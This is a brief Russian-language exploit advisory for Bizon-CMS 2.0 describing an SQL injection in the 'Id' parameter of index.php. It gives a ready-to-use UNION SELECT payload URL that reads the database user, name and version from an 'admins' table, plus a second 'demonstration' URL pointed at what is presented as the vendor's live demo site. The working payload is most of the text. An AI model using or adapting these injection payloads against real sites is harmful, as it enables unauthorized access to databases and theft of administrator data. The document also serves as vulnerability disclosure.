Программа: Bizon-CMS 2.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «Id» сценарием index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
www.site.com/photo/index.php?Page=ShowPicture&Id=-756+union+select+1,2,3,4,5,6,
concat_ws(0x3a,user(),database(),version()),8,9,10+from+admins/*
Демонстрация:
http://www.bizon-soft.com/bizon-cms-demo/photo/index.php?Page=ShowPicture&Id=
-756+union+select+1,2,3,4,5,6,@@version,current_user,database(),10+from+admins/*